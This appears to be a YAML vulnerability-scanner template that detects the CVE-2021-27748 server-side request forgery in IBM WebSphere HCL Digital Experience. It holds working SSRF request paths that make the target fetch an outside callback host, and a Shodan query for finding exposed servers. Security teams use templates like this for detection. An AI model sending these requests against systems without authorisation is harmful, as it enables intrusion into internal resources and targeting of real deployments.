48 lines
1.7 KiB
YAML
48 lines
1.7 KiB
YAML
id: CVE-2021-27748
|
|
|
|
info:
|
|
name: IBM WebSphere HCL Digital Experience - Server-Side Request Forgery
|
|
author: pdteam
|
|
severity: high
|
|
description: |
|
|
IBM WebSphere HCL Digital Experience is vulnerable to server-side request forgery that impacts on-premise deployments and containers.
|
|
impact: |
|
|
Successful exploitation of this vulnerability could allow an attacker to bypass security controls, access internal resources, and potentially perform further attacks.
|
|
remediation: |
|
|
Apply the latest security patches or updates provided by IBM to mitigate this vulnerability.
|
|
reference:
|
|
- https://blog.assetnote.io/2021/12/26/chained-ssrf-websphere/
|
|
- https://support.hcltechsw.com/csm?id=kb_article&sysparm_article=KB0095665
|
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27748
|
|
classification:
|
|
cve-id: CVE-2021-27748
|
|
metadata:
|
|
verified: true
|
|
max-request: 3
|
|
shodan-query: http.html:"IBM WebSphere Portal"
|
|
tags: cve2021,cve,hcl,ibm,ssrf,websphere
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}'
|
|
- '{{BaseURL}}/docpicker/internal_proxy/http/oast.me'
|
|
- '{{BaseURL}}/wps/PA_WCM_Authoring_UI/proxy/http/oast.me'
|
|
|
|
host-redirects: true
|
|
max-redirects: 2
|
|
stop-at-first-match: true
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "Interactsh Server"
|
|
|
|
- type: word
|
|
part: body_1
|
|
words:
|
|
- "Interactsh Server"
|
|
negative: true
|
|
# digest: 490a0046304402200ba3597e1cd51ea49029981ba317f0f962cc8082d2f3796e4d59fc9138bf9d9d0220226c8cb7207a0c85488b5ce96a38f6e0b616ebb9b487135b1fda864f9d6503d2:922c64590222798bb761d5b6d8e72950 |